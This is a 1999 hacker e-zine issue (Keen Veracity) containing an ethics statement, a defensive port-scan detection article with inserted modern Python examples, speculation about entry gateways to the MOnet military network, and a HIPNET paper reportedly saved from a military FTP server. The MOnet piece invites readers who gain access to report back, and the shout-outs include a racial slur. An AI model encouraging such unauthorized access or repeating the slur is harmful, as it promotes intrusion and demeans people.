/* Keen Veracity...................................Volume 3, Issue 8 */

e   e  eeee eeee eeeee    ee   e eeee eeeee  eeeee eeeee e eeeee e   .e
8   8  8    8    8   8    88   8 8    8   8  8   8 8   8 8   8   8    8
8eee8e 8eee 8eee 8e  8    88  e8 8eee 8eee8e 8eee8 8e    8e  8e  8eeee8
88   8 88   88   88  8     8  8  88   88   8 88  8 88    88  88    88
88   8 88ee 88ee 88  8     8ee8  88ee 88   8 88  8 88ee8 88  88    88
88 Keen Veracity Technical Journal                  July 21st, 1999 88
88eeeeeeeeeeee.      .  Legions of the Underground    .  .eeeeeeeee88
                   [most of the editing done by headflux]

.-[ Keen Veracity, Volume 3, Issue 8 ]
|
|__Introduction
|  |_ kv[1]; General Information..................................staff
|  |_ kv[2]; Statement........................................optiklenz
|
|__Computer Security
|  |_ kv[3]; Port Scan Detection..............................t0ucht0ne
|  |_ kv[4]; Introduction to MoNet...............................uplink
|  |_ kv[5]; Article on HIPNET..................................zipcode
|  |_ kv[6]; Intrusion Detection Systems......................ProtocolD
|  |_ kv[7]; Another IE Exploit?.................................ntwak0
|  |
|  |__Programs/Source Code
|  |  |_ kv[8]; tryseg.c.........................................guidob
|  |  |_ kv[9]; match.c...........................................icesk
|  |  |_ kv[10]; netsniff.c (reprint)...........................mnemonic
|  |  |_ kv[11]; liberty.c........................................guidob
|  |
|  |__Miscellaneous
|     |_ kv[12]; Ode to JP....................................krankshaft
|     |_ kv[13]; Top WWW Sites...................................ntwak0
|
|__Telephony/Radio
|  |_ kv[14]; Intro to Loops.....................................hitman
|
|
|_ kv[i]; outro


kv[1]; /* General Information..................................staff */



SYSCON IS BACK AND IN EFFECT: http://www.legions.org/syscon for info

[posse]:
```````
    

     cap'n'crunch
     optiklenz                     uuuuuu    uuuu
      aphex           guidob      uuuuu      uuu
      [havoc]  touchtone   chiXy  uuuuu      uuu
      lothos    slfdstrct  ntwak0 uuuuu      uuu 
      headflux      ProtocolD     uuuuu      uuu
      kingbong      touchtone     uuuuu      uuu
      Kanuchsa                    uuuuu      uuu
      Digital Ebola                uuuuuuuuuuuuu
      duncan silver                 uuuuuuuuuu
                                           uuu
                   [lou] www.legions.org

             efnet - #legions  come hang with
      grouppiez, and other cracked out porno stars
           -  legions ircd still being tweak'd

[shoutouts]: no one in particular
```````````

[copyLeft]: whatever...
```````````

Download Pictures of Legions at Defcon7 from the following sites:
===============================================================
***| http://defcon.legions.org
***| http://www.legions.org/defcon7/index.html

ef-te-pee
================
***| ftp://www.underzine.com/rootfest/defcon/defcon7.html

----------------------------------------
call the authorities optik's drunk again
----------------------------------------
<cripto> gimme shouts next issue
<cripto> for being a p1mp.
<optiklenz> sure
<cripto> word.
<optiklenz> joe gotta hand cuff yur hoes doh
<cripto> nice zine, btw.
<optiklenz> so they dont be mewvin when i try to humpzorize em
<optiklenz> thnks
<cripto> articles with real substance.
<cripto> makes b4b0 look like dr. seuss.
-------------------------------------------------------------
it's just a matter of taste...  Some people obviously have it.
-------------------------------------------------------------

kv[2]; /* Statement........................................optiklenz */

Something needs to be said...

 First off...
 Earlier this year an assembly of organizations decided
 to release a joint statement "condemning" Legions. This
 evidently was before any of them contacted Legions
 requesting information on what the true plight was. Because
 of some iniquitous media coverage a few people
 misunderstood our motives. This of course is in regards to the
 past "China Human Rights incident".

  We wanted to bring a tragic predicament to surface so
 other people could speak out as well. The media was
 misinformed when they reported about our goals to aid these
 countries in their fight for freedom of speech.  They (the
 media) stated we (Legions) wanted to damage certain
 computer networks in other parts of the world. We wanted to
 help them with the situation concerning their lack of
 freedom, and human rights why would we want to destroy or
 damage their networks the same networks that give them what
 little freedom they have to communicate as people.  That
 just makes no sense at all. I ask that the people who joined
 to make the statement condemning Legions take that into
 consideration and next time contact us so that we could discuss
 things, and clear up misunderstandings.  It's not a funny matter
 when people's lives, and reputations are at stake.

 As hackers the 
 computer has built our lives, and in turn we have 
 built our lives around the computer we would never 
 choose to harm such a valuable resource.  The term
 hacker doesn't discriminate.  You can be a federal
 agent, but the best damn coder in the world and in
 the sense of the word you'll be a hacker.  Bill Gates, 
 a hacker turned billionaire. Software designers, security
 specialist the people who help protect your networks these
 people are hackers.  " Information, and data
 is to be cherished, (for it can only build you not hurt you)
 cultivated and developed  not to be annulled or locked
 up. Hacking is an expansive applied knowledge in any
 technical field.  Destruction, and the unschooled acts 
 of those who live without moral are what separates the
 "hackers" (those whose main purpose of life is to learn,
 expand, and apply what they learn) from those that go 
 as far as turning the computer on."( -The previous quoted
 statement was excerpted from Keen Veracity 3 www.underzine.com).   
 


 Something serious is going on at the moment.  A string of "attacks"
 against our own government. And till now no one has said anything.
 The actions of these groups are sincerely 
 half-witted, and absurd for it will at the end accomplish nothing except 
 a few more long term jail sentences. The current actions of 
 these self-proclaimed "hackers"  have me infuriated. 
 The people DOS'ing government sites, and defacing mil, and 
 gov domains, and damaging information these people 
 aren't hackers they are nothing more than unschooled
 adolescent teens with nothing better on their hands.  
 They are an endangerment to the true aspect of computer
 science dealt with by the hacker community.
 Call what they are doing what you want, but don't call 
 it "hacking" because it's not.  So many articles have 
 surfaced  which referred to what these cracker cults
 are doing as "hacking" ex;  "Hackers attack government" -
 "Hackers strike again" (false) Call them destructive call them by
 their first name but for the sake of god don't just yank
 out the term "hackers" for a better story for the sake of
 god don't defile the name "hacker" for your personal gain. 
 A hacker lives by a strong code of ethics. We wouldn't be 
 issuing this statement if we didn't.

 A government investigation is currently pending on the above matters.
 If we don't do something about this now the government will surely
 hold us accountable, and I'm not talking jail time. We have a lot to
 lose if we don't stop these people from making us look bad.  Though
 we are not affiliated with them directly certain mainstream
 media has left a misleading trail.  Some of our rights as computer
 partisans may be at stake here.  With that said I ask that all sites
 that archive these senseless hacks suspend documenting these fatuous 
 acts for the time being.  The script kiddies that go
 out and target government and military servers are media crazy, and 
 you are only adding fuel to their fire by flashing their work to the
 public.   A note to the lamers This is where it ENDS...  In the 
 end it's what you choose to do that makes you who you are.
 So make sure what you choose to do doesn't make you look like
 an ass.

 

http://www.hackernews.com/archive/1999/noaa/index.html
http://www.hackernews.com/archive/1999/army/index.html
http://www.hackernews.com/archive/1999/monmouth/index.html
http://www.hackernews.com/archive/1999/argonne/index.html
http://www.hackernews.com/archive/1999/nswcl/index.html
http://www.hackernews.com/archive/1999/senate2/index.html
http://www.hackernews.com/archive/1999/bnl/index.html
http://www.hackernews.com/archive/1999/doi/index.html

The above is an archive of recent government, and military site
defacements done by what seems to be comparable to the works of
5year olds...
 
Look at the archived sites, and tell me something doesn't need to be done.

Just letting people know we aren't going for their childish actions.
We don't advocate any of the trash being done by these uninspired idiots.
We're "hackers" the other white meat!


------------------001----------------------------------------------
the below is an email, and response excerpted from Keen Veracity 4
-------------------------------------------------------------------
[mail] <plankton>
  Do you still hack?

[response]

 Well it depends on your analogue of hacking. By the authentic
  formalization I "hack" everyday.  Whether I'm coding, or doing
  Network checks it's still hacking.  Hacking has little to do
  with the "illegal" entry of computer systems apart from the
  Technical, and systematic aspect of it.  Illegally accessing a system     
  for no intended reason is not something I advocate or 
  advise performing.  What I suggest achieving is going out, and   
  learning, and questioning the system itself before trying to exploit it.  
  And even once you feel you have a broad knowledge of the system make sure
  you use what you know to build things, and not fuck things up.
  System admins who are affected by crackers turn to hackers in
  order to secure their systems. They turn to the philosophies,
  documents, and programs written by "hackers"...  Let's not
  make them look the other way.  We are here, and we are skilled.
  What your brain dead system administrator can do in a week we can
  accomplish in a matter of minutes more practically.  That's the message 
  that should  be put across.  One of positively not one that says "We're
  going to take you down."   Read my introduction in Keen Veracity
  3 I go into greater detail on the subject at hand.
  http://www.t00ned.org/optik/kv/kv3.txt

-Steve Stakton <optiklenz>

Steve Stakton - <optik@shockimaging.com> -(optiklenz) 
-Head Security Advisor  for NACC
Legions Of the Underground - Our title name is not meant to seem
dark.  Don't get the misconception that we are some sort of
cult or only wear black.  The computer Underground is a symbol
something that is important, and we treasure its existence so in
its honor we use the name Legions Of the Underground.
We are just a bunch of computer enthusiasts who
enjoy working together. Nothing more nothing less.



kv[3]; /* Port Scan Detection..............................t0ucht0ne */

Port scanning: everyone does it. Whether it's an administrator trying to
find out what is being spoken on a remote node, or a 15 year old script kid
looking for exploitable boxes, port scanning is the first step in
identifying services on a networked machine. I've always been bewildered
when I've had conversations with network security experts and semi-aware
administrators who explain to me that they've invested a lot of money and
resources into the latest firewall technologies and intrusion detection
software, yet never even considered port scan detection tripwires. Being
aware of port scans can alert any competent sysadmin of potential
compromise long before it's too late. With the wealth of software out
there dedicated to finding everything from open NetBIOS shares to web
server exploitation, port scan detection software becomes more important
than ever. Furthermore, it's safe to say that making your boxes layer 3
aware is a good idea. Even a wayward ICMP Echo can be the first sign of a
lurking intruder. In this whitepaper, I'd like to talk about several
packages that encompass making your network "probe" aware. I will talk
about the pros and cons of automated defenses employed by these packages,
plus give a general overview of why it's a good idea to also be layer 3
aware.

The first important thing to recognize is that port-scanning software has
made some significant advances in the last year or so. They have become
stealthier, faster, and smarter. For example, two years ago, most people
were using Strobe written by Julian Assange
(ftp://suburbia.net:/pub/strobe.tgz). It was quick and dirty (possibly
still the fastest port scanning software to date), and would spit out the
services spoken at the other end. Now, most people are using NMAP, written
by Fyodor (http://www.insecure.org/nmap), which not only does port
scanning, but will also do TCP fingerprinting, compare the fingerprint to
its database, and guess what O/S is at the other end. It's capable of a
myriad of different scans, including a stealth scan that can beat a lot of
port scan detection software. So, with one little piece of software, a
potential cracker can identify the services being spoken on your networked
host, what operating system is being run, and do it undetected. Scared?
You should be. In many aspects, it's pointless to remove operating system
specific banners from your daemons because software like NMAP and Queso do
a great job of identifying the O/S through TCP fingerprinting.
Unfortunately, a lot of admins and network engineers aren't even familiar
with these programs, but those that are realize how important it is to be
at least semi-aware of when these tools are being used against them.

"So, T0uchT0ne, what can we do about this?" I hear you asking. I'm glad
you asked, because we now are going to discuss several options that are
available. My personal favorite is Abacus Sentry
(http://www.psionic.com/tools/portsentry-0.90.tar.gz). It's a piece of
software written by Craig Rowland as part of the Abacus Security Project.
Sentry has the ability to detect port scans, and implement automated
defenses. These defenses can encompass everything from entering the
offending machine into your routing table (routing the host into oblivion)
to adding the attacker to the hosts.deny file. Even more exciting, is the
ability to add custom commands to the Sentry configuration file that would
allow you to be paged or emailed in the event of a port scan trigger.

To understand what happens with port scan detection software, we need to
cover some basic concepts with how a TCP connection is established. Host A
sends a TCP segment to Host B with the syn bit set to 1, and the ack bit
set to 0. This makes sense, since the first step in a connection is to
syn"chronize" Host A and Host B. Host B then responds with a TCP segment
(notice that I'm not using the term packet, because to TCP, there is no
such thing as a packet; don't make this mistake) that has the syn bit set to
1 and the ack bit set to 1. After the initial handshake, both hosts send
the TCP stream with the syn and ack bits set to 1 right up until the
teardown of the connection. This is a very simple explanation. Suffice it to
say, I've not gone into an explanation of how sequencing works, etc., because
this is not a whitepaper on TCP, but on port scan detection. Most port
scanners work on this simple principle, of opening TCP connections to a
host, and seeing what answers on the other side. The secret to port scan
detection is making sure you have something that is listening on ports
that don't normally have daemons installed. Since we know FTP is usually
on port 21, and there is already an FTP daemon installed on port 21, we
can't bind a sentry device on it, since no two daemons can monitor the
same ports. Fortunately, the good news is, the implementation of port scan
detection is incurred through the basic understanding that most intruders
are scanning a range of ports from 1 - 1024 (and higher) in a sequential
manner. Since we can't bind to 21, let's bind to 22, 23, 24, 25, etc.
(excluding ports with listening daemons). If a connection is made to port
22, and we don't have a service on port 22 (which we do, but it's our
sentry software) then we know there is a good chance that a port scan is
being run. Of course, you don't want to trigger your defenses based on one
un-used port. That is why Abacus Sentry allows you to set the "trigger".
For example, on my hosts, I usually set a trigger of 2, so that it takes 3
consecutive ports with no services on them to be hit before you get
entered into my hosts.deny file or routed to nowhere.

I hear you calling foul. Yes, but I could spoof my source address to be
your upstream router, and the next thing you know, your machine is cut off
from The Internet. True. You could. This is one of the downsides of port
scan detection software. It can be used against you to deny your service.
This shouldn't stop you from using it. Here is why.

First off, with Sentry, there is a file called "hosts.ignore" that allows
you to configure the detection software to never take action on specific
hosts. I've gotten into the habit of tracerouting out of my network to
different hosts, and recording which routers within the upstream I usually
go through. I enter these routers' IP addresses into my hosts.ignore file.
This isn't foolproof, but for the most part, does a lot more good than
bad. For the record, in the 2 years I've used Abacus Sentry on a myriad of
different networks, I've never been the victim of a DoS attack where
Sentry was used against me. My opinion (and this is also the
opinion of the author of Abacus Sentry) is that the benefits of using port
scan detection software far outweigh the cons.
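
The decoy-port trigger and the hosts.ignore safeguard described above, as an added example (this is not Abacus Sentry's code and not part of the original article). The class name, the choice to count distinct decoy ports per source rather than strictly consecutive ones, and the documentation-range addresses in the constructed event list are assumptions.

```python
from ipaddress import ip_address, ip_network


class DecoyTripwire:
    """Counts connections to ports that have no real daemon behind them."""

    def __init__(self, decoy_ports, trigger=2, ignore=()):
        self.decoy_ports = set(decoy_ports)   # ports the sentry is bound to
        self.trigger = trigger                # act once hits exceed this value
        self.ignore = [ip_network(n) for n in ignore]  # hosts.ignore entries
        self.hits = {}      # source -> set of distinct decoy ports touched
        self.blocked = []   # sources, in the order they tripped the wire

    def is_ignored(self, src):
        addr = ip_address(src)
        return any(addr in net for net in self.ignore)

    def observe(self, src, dport):
        """Return the verdict for one inbound connection attempt."""
        if dport not in self.decoy_ports:
            return "pass"              # real daemon or unmonitored port
        if self.is_ignored(src):
            return "ignored"           # never act on hosts.ignore entries
        if src in self.blocked:
            return "already-blocked"
        seen = self.hits.setdefault(src, set())
        seen.add(dport)
        if len(seen) > self.trigger:   # trigger of 2 -> third decoy port blocks
            self.blocked.append(src)
            return "block"
        return "counted"

    def deny_lines(self):
        """Lines a TCP-wrappers hosts.deny file would gain for blocked hosts."""
        return [f"ALL: {src}" for src in self.blocked]


def replay(tripwire, events):
    """Feed (source, destination port) pairs through the tripwire."""
    return [tripwire.observe(src, port) for src, port in events]


# Constructed sample: FTP (21) has a real daemon, 22-24 and 26 are decoys.
DECOY_PORTS = {22, 23, 24, 26}
HOSTS_IGNORE = ["192.0.2.1"]           # assumed upstream router address
EVENTS = [
    ("198.51.100.7", 21),              # user talking to the real FTP daemon
    ("198.51.100.7", 23),              # a single stray hit: below the trigger
    ("203.0.113.50", 21),              # sequential scan starts on a real port
    ("203.0.113.50", 22),
    ("203.0.113.50", 23),
    ("203.0.113.50", 24),              # third decoy port: trigger exceeded
    ("203.0.113.50", 26),
    ("192.0.2.1", 22),                 # scan carrying the router's address
    ("192.0.2.1", 23),
    ("192.0.2.1", 24),
]

if __name__ == "__main__":
    tw = DecoyTripwire(DECOY_PORTS, trigger=2, ignore=HOSTS_IGNORE)
    for (src, port), verdict in zip(EVENTS, replay(tw, EVENTS)):
        print(f"{src:>15} -> {port:<3} {verdict}")
    print(tw.deny_lines())
```

Running the same events with an empty ignore list puts the router's address in the blocked set, which is the denial-of-service downside the article describes.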

I also believe in using JAIL (Just Another IP Logger), which you can find
at www.genocide2600.com/~tattooman using their search engine. Logging ICMP
traffic is the mark of a good security admin. Sure, you don't need to log
all ICMP traffic, but logging echoes and destination unreachables is a
sure way of catching the first steps in an attack. Granted, most echoes
and other ICMP traffic is legit, but when you see a ping from some host in
Germany, and you know you don't have any customers or users in Germany,
something could be up.

Configuring your syslog daemon properly, and logging all your scan
detection software to one file can allow you to write some pretty snazzy
perl scripts to boot. I'll leave this to your imagination.
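
One shape such a script could take, as an added example in Python rather than perl (not part of the original article): it reads a single consolidated log and flags sources whose ICMP echo was followed within five minutes by decoy-port hits. The log lines are constructed, and the `icmplog` and `scandetect` tags and message formats are assumptions, not the real output of JAIL or Abacus Sentry.

```python
import re
from datetime import datetime, timedelta

# Constructed sample of a consolidated syslog file (formats are assumed).
SAMPLE_LOG = """\
Jul 21 03:14:07 gw icmplog: echo request from 203.0.113.50
Jul 21 03:14:09 gw scandetect: connect from 203.0.113.50 to tcp port 22
Jul 21 03:14:09 gw scandetect: connect from 203.0.113.50 to tcp port 23
Jul 21 03:14:10 gw scandetect: connect from 203.0.113.50 to tcp port 24
Jul 21 04:02:31 gw icmplog: echo request from 198.51.100.7
Jul 21 09:40:00 gw icmplog: destination unreachable from 192.0.2.77
Jul 21 11:15:42 gw scandetect: connect from 198.51.100.99 to tcp port 23
Jul 21 11:20:00 gw sendmail[411]: unrelated line that must be skipped
""".splitlines()

LINE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (\w+)(?:\[\d+\])?: (.*)$")
ICMP = re.compile(r"^(echo request|destination unreachable) from (\S+)$")
SCAN = re.compile(r"^connect from (\S+) to tcp port (\d+)$")


def parse(line, year=1999):
    """Return (when, kind, source, port) or None for lines we do not track."""
    m = LINE.match(line)
    if not m:
        return None
    stamp, tag, msg = m.groups()
    # syslog timestamps carry no year, so the caller supplies one
    when = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
    if tag == "icmplog":
        hit = ICMP.match(msg)
        if hit:
            return when, hit.group(1), hit.group(2), None
    elif tag == "scandetect":
        hit = SCAN.match(msg)
        if hit:
            return when, "scan", hit.group(1), int(hit.group(2))
    return None


def correlate(lines, window=timedelta(minutes=5)):
    """Summarise activity per source and mark echo-then-scan sequences."""
    last_echo = {}
    report = {}
    for line in lines:
        event = parse(line)
        if event is None:
            continue
        when, kind, src, port = event
        entry = report.setdefault(
            src, {"echo": 0, "unreach": 0, "ports": [], "ping_then_scan": False})
        if kind == "echo request":
            entry["echo"] += 1
            last_echo[src] = when
        elif kind == "destination unreachable":
            entry["unreach"] += 1
        else:
            entry["ports"].append(port)
            seen = last_echo.get(src)
            if seen is not None and timedelta(0) <= when - seen <= window:
                entry["ping_then_scan"] = True
    return report


def suspects(report):
    """Sources that pinged first and then touched decoy ports."""
    return sorted(s for s, e in report.items() if e["ping_then_scan"])


if __name__ == "__main__":
    summary = correlate(SAMPLE_LOG)
    for src in sorted(summary):
        print(src, summary[src])
    print("ping-then-scan:", suspects(summary))
```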

If you have any questions, or want to offer me some good advice on past
experiences you've had with detection software, email me at
root@t0ucht0ne.ca. I'd love to hear from you.

Shout Outs: All of Legions of the Underground and #legions, Drown, Mopar,
most of #hacking, Stratus (where ever you are), Kweiheri (you will be
owned by Kwei), NodeRaTz, and The White Niger (pronounced Ni-Jer).

* T0uchT0ne #

			 [-------------------------------------]


kv[4]; /* Introduction to MoNet...............................uplink */

            01001101  01101111  01001110  01000101  01010100

                    .-.-.-. .----. .-..-. .---. .---.
                    | | | | | || | | .` | | |-  `| |'
                    `-'-'-' `----' `-'`-' `---'  `-' 
          Information compiled and written by lowtek aka uplink
                                    of
                         Legions Of the Underground
                            
                          http://www.legions.org

            01001101  01101111  01001110  01000101  01010100  

Introduction

MOnet (Multi-wavelength Optical Networking Technology) is about the most
advanced network that is in progress at the moment besides SOnet.  It
combines all of the government/military applications.  MOnet is connected
to many military domains.  Many Bell RBOCs and private telecom companies
are working on the project together, such as:

AT&T
Bell Atlantic
BellCore
Bellsouth
Lucent Technologies
Pacific Telesis
SBC/TRI
NSA
DARPA

MOnet is being put into progress in Washington D.C. and is a 100 million
dollar project from good old .mil (don't you just love where your taxes are
going?). It is funded by ARPA (Advanced Research Projects Agency). MOnet is
basically SOnet, but it has been improved.  The way it was improved is that
it signals data through wavelengths of light.  This way of transporting
data is very fast and very efficient.

The MOnet in Washington is interconnecting Bell Atlantic's Silver Spring
Laboratory, the Naval Research Laboratory, and the National Security
Agency. This network is being expanded all the time to group together
other such government groupings.  The New Jersey MOnet at the moment is
interconnecting The Red Bank of New Jersey and is currently being tested at
the speed of 2.5 G/bits transmission.

Impact

Assessing Multi-wavelength Optical Networking (MONET) for commercial
  viability and Government applications
Balanced approach with focus on economics & architectures, enabling
  technology, and networking testbeds
Demonstrating networking through experimental interconnected networking
  testbeds (in NJ and DC)
Strong team representing equipment manufacturers, management software
  developers, and network operators
Technology transfer through commercialization by partners

This shows MOnet's actual gates and connections:

                                 NSA
                                  |
           DARPA                  |
            |                     |
            |                     |
            |                     |
            |       -----------------------------      |NASA
            |       |                           |      |
            --------|                           |      |
DISA----------------|                           |------|
            --------|           MOnet           |------------------GateWay
            |       |                           |------|
            |       |                           |      |
            |       |                           |      |
            |       |___________________________|      |
            |                    |                     |DIA
           DISA                  |
                                 |
                                 |
                                 | 
                                NRL

This shows MOnet at its last stage complete which includes DIA, NRL, DISA,
NASA, and DARPA.  These are all very important military operating groups
that provide the power of MOnet.

And what's this GateWay? Huh? Ohh, so there is an actual way into the
system. Yes there is, but to get into MOnet is to be able to pretty much
hack anything. This system does not only use high DES encryption but also
uses hardware encryption (just like SIPERNET).  These gateways
supposedly can be accessed through dial-ups in Washington D.C. and New
Jersey also through a domain that is hosted by MOnet.

                    c0mputer
                    |------|   Logging on via
                    |      |  ----->  ------>  
dial-up connection  |      |-----------------|the 
   /----------------|------|                 | Internet
  /            This represents a             | 
 \|/          computer logging on via        | 
  |          the internet and via dial-up    |
                                            \|/
                                             |
\\//----------------------------|              
  |                             |            \\//
  |                             |              |-----GateWay Through the
  |                             |              |     Internet
Modem Pool                      |              |
                                |              |
                                |              |
                                |--------------|
                                |
                                |
              |============================================|  
              |Dial-up connections and internet connections|
              | Bundle together and transfer straight into |
           |--|                 MOnet                      |
           |  |____________________________________________|   
           |                    |
           |                    |
           |                    |____________________________________
           |                    |                                    |
           *------------------> |                                    |
                                |               MOnet                |
                                |                                    |
                                |____________________________________|

This is a security threat that it can be accessed over the web because if
you do this you may enter MOnet without having to deal with the
encryption.  Now only some .mil domains and only some .gov also. If you
reach these or get access any other way please e-mail me so I can update
this text at lowtek@uswestmail.net

MOnet will continue to grow within the United States and start to progress
to other businesses. This network is still in its starting stage but is
finally becoming up to date a bit. I could not find any other info on
this subject (considering the fact that they want to keep it secret).

			 [-------------------------------------]


kv[5]; /* HIPNET........................................... .zipc0de */ 
I found this file on a military ftp server, which I 
thought was very interesting so I saved it along with
other documents, as it turns out it's on the HIPNET,
which is a military network used by our government. 
If you have some more information on the HIPNET please
e-mail me at zipc0de@hotmail.com and I'll include it in
my further text files on military/government networks. 
As for now enjoy the file and don't get into trouble :]




HIPNET User Requirements

Revision 4.0

1. Introduction

The High Performance Network (HIPNET) seeks to develop a reliable
multicast transport protocol and IP QoS mechanisms which satisfy
requirements of US Navy and French MOD applications.  The applications
are multimedia in nature and include: bulk file transfer, image 
transfer, audio/video, email/messaging, interactive planning missions
(whiteboarding) and simulations, realtime data transfer, 
teleconferencing and others.  The requirements that these applications
impose on the transport protocol and the IP QoS facilities are 
examined in this paper.  The general requirement is a reliable 
multicast service, yet, there are many variations of this service. 
There are two highly variable aspects to a reliable multicast service:
reliability which spans a spectrum from best effort to absolute and, 
ordering, which might mean anything from simple source delivery to causal,
total ordering.  Several existing protocols provide reliable multicast
service, yet none has achieved the status of open standardization 
acceptance.  One overriding requirement of the US Navy user community 
is the requirement that the reliable multicast service be provided by
a protocol that is accepted as an open standard, much as TCP and IP 
are in today's Internet.

This paper is a culmination of a three-stage process. The first is to
define a chart of communication characteristics that can be used to 
distinguish applications relative to their requirements (section 3). 
The second is to define a list of generic applications that encompass
the totality of all envisioned applications and then to apply the 
characteristics chart to each of them (section 4).

2. The Operational Environment:  Communication Channels

Consideration must be given to the characteristics of  the 
communication channel over which the data will be transmitted. 
The communication channel characteristics for the US Navy and 
French MOD vary widely, depending on the operational environment,
and range from low data rate, simplex channels to high capacity,
ATM channels. Part of the channel characteristics could include 
asymmetrical networks where the data channel transfer rate between
sender and receiver is different than the rate between receiver and sender.
This would provide a communication environment that is 
vastly different than the normal communication channel  characteristics
which could include Ethernet, FDDI or ATM.  Therefore, each 
application must be able to specify those critical characteristics 
that the communication channel must support in order for the
application to be able to meet the mission requirements.   
The project, however, must focus on a subset of this entire 
range in order to live within budget and time constraints, therefore,
the operational environment identified for HIPNET is ATM and 
IP over ATM.

3. Communication Characteristics

The user application can only meet its mission requirements if the
underlying communication architecture provides the mechanisms to either
define or control a specific characteristic that is needed to meet the
specific requirements of the user application.  Some of these mechanisms
could be located within the user application itself, the underlying 
transport service or as part of the network interface.  There are 
tradeoffs in determining the optimum location for each of these
mechanisms since each location may have significant performance
or user compatibility requirements. Specific characteristics are outlined  
in the following paragraphs. As part of the user applications requirements, 
the user may wish to  send data to either one receiver or multiple
receivers.  Depending upon how this mechanism is implemented, this 
could be accomplished using one protocol architecture that provides 
both capabilities or two separate protocol architectures.

3.1 Group Management

The key issue in group management is: does the application need to
identify the receiver group, i.e. have group knowledge?  The
knowledge could be total, partial or none.  If the knowledge is
total, then the group is said to be known.  If the knowledge is
partial, then the group is said to be partly-known. If no knowledge
of the group is required, the group is unknown.

Multicast groups could consist of fixed or dynamic memberships.  
The management of the groups could take place external to the 
transport protocol and in some cases be manually performed. Any 
protocol running over IPv6 has the IGMP (Internet Group Management
Protocol) available that provides network level functions for
joining/leaving/routing of groups.  IGMP is sufficient in many 
cases, but, if the application needs any control over the membership,
or monitoring of the membership, such capability must be performed 
above IGMP. The size of the multicast group, the method of either 
joining or leaving the group, and the responsibility for maintaining 
the configuration of the group are characteristics that could
be different between specific user applications that would still 
use a common reliable multicast protocol. An additional requirement 
could include the ability to support multicast receivers who may 
temporarily leave the multicast group but want to maintain current
with data that was transmitted while they were not part of the 
multicast group.

Applications define a group management policy that may allow dynamic
joins; may limit admission to a multicast association to a subset 
of the participating nodes or may not allow any nodes outside of a
fixed membership to join. The join/leave policy is also affected
by the reliability constraints, for example, an application may
require atomicity: the ability to deliver within a specified 
interval once it's deliver to one of the group, to all members
of the group. Since the policy of group membership is so application
dependent, it makes sense to not implement group policy in the 
protocol stack, however, this does not relieve the protocol stack
of responsibility to provide necessary group management funcitonality
for application use.

An event like a node joining or leaving a multicast group may or
may not require notification depending on the reliability 
constraints and security policies.  The notification may be required
by a central controlling node (a server or master side) or it 
may be required by the rest of the group. The policy will be 
established by the application; however, the transport layer may 
be required to have mechanisms necessary to effect such events.

3.2 Topology

Applications differ in their requirements for data flow 
direction. Some applications (e.g. broadcast TV)  involve a 
single transmitter and a group of receivers.  This arrangement is
referred to as point-to-multipoint (PT->MP) communications.
Another arrangement is to allow the receivers to transmit back 
to the sender (MP->PT) (sometimes referred to as concast), but not
to each other. Yet another is the topological configuration in
video teleconference which is multipoint-to-multipoint (MP<-->MP).

3.3 Scalability

Scalability makes the mechanisms necessary to implement a reliable 
multicast and an IP QoS an issue. Multicast's most basic benefit 
(that the number of transmissions is reduced from the unicast case)
may be negated if acknowledgements are required from all receivers.
There are schemes for minimizing the amount of control packets from
receivers to transmitters and for limiting the number of retransmissions,
however, the basic dilemma remains. One scheme is to have the 
receivers send a negative acknowledgement (an explicit request for
retransmission) instead of positively acknowledging each packet, 
however, the NAK algorithm may also degrade under implosion given a
sufficiently large receiver set. There are schemes for limiting 
NAKs as well as ACKs, and often hybrids are proposed. A tree
structured set of proxy receivers where the proxies assume 
responsibility for reliable delivery is one such scheme.

Some applications negate the scalability issue if the number of
participants is guaranteed to be small.  An example would be email
multicast on an organizational basis where the number of 
organizational units is small (say less than 15).  Another example
is a video conference in an N X N configuration (all participants
are both sender and receiver), and might not consist of more than
15 people.  

On the other hand, applications that execute in small-scale groups
today may need to accommodate large groups tomorrow because of 
the explosive growth of the Internet and its associated applications
and unforeseen uses of those applications.  Put another way: it's 
difficult to predict future uses of technology based on past experiences.
The Internet itself, for example, was created primarily to service
file transfers and remote logins. Only after the technology was 
created and utilized, did researchers realize that its main use would
be for the exchange of email (and, subsequently, access to the World
Wide Web).

3.4 Data Ordering:

The delivery of data from the multicast sender to the multicast 
receiver may require that the delivery service support a range of 
ordering including none, source, causal, or total ordering. Source
is an ordering that a unicast transport protocol like TCP would 
provide by delivering messages between a pair of participating 
endpoints in the order that they were transmitted. Causal is an 
order that guarantees that all messages that are related are ordered,
such that, a receiver would not receive a particular message if 
all related messages had not previously been delivered.  Total 
order means that multiple streams from multiple senders are delivered 
to each receiver in the same relative order.  There are often 
requirements in distributed processing for variations on these 
ordering properties for the purpose of attaining consistency, 
fault tolerance, and stability.  The support of total or causal 
ordering typically requires the transport protocol to provide a
timestamp of some sort.
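
Causal ordering as described above, as an added example (not code
from the HIPNET project): it assumes the "timestamp of some sort" is
a vector timestamp with one counter per group member, and a receiver
holds back any message whose causal predecessors have not yet been
delivered. The class, function and message names are hypothetical.

```python
class GroupMember:
    """One sender/receiver in a multipoint-to-multipoint group of fixed size n."""

    def __init__(self, index, n):
        self.index = index
        self.clock = [0] * n     # messages delivered so far, counted per sender
        self.held = []           # received but not yet deliverable
        self.delivered = []      # bodies in the order handed to the application

    def send(self, body):
        # Stamp the message with everything this member has delivered so far,
        # plus one for the message itself.
        self.clock[self.index] += 1
        return (self.index, tuple(self.clock), body)

    def _deliverable(self, sender, stamp):
        # Source order: this must be the next message from that sender.
        next_from_sender = stamp[sender] == self.clock[sender] + 1
        # Causal order: everything the sender had seen must already be delivered here.
        seen_dependencies = all(stamp[k] <= self.clock[k]
                                for k in range(len(stamp)) if k != sender)
        return next_from_sender and seen_dependencies

    def receive(self, message):
        """Queue a message, deliver whatever has become deliverable, return the log."""
        self.held.append(message)
        progress = True
        while progress:                      # one delivery can unblock held messages
            progress = False
            for msg in list(self.held):
                sender, stamp, body = msg
                if self._deliverable(sender, stamp):
                    self.held.remove(msg)
                    self.clock[sender] = stamp[sender]
                    self.delivered.append(body)
                    progress = True
        return list(self.delivered)


def whiteboard_demo():
    """Constructed scenario: the network hands C the reply before the original."""
    a, b, c = (GroupMember(i, 3) for i in range(3))
    draw = a.send("draw line")               # stamp (1, 0, 0)
    b.receive(draw)
    erase = b.send("erase line")             # stamp (1, 1, 0): depends on draw
    after_erase = c.receive(erase)           # held back, nothing delivered yet
    after_draw = c.receive(draw)             # draw delivered, then erase released
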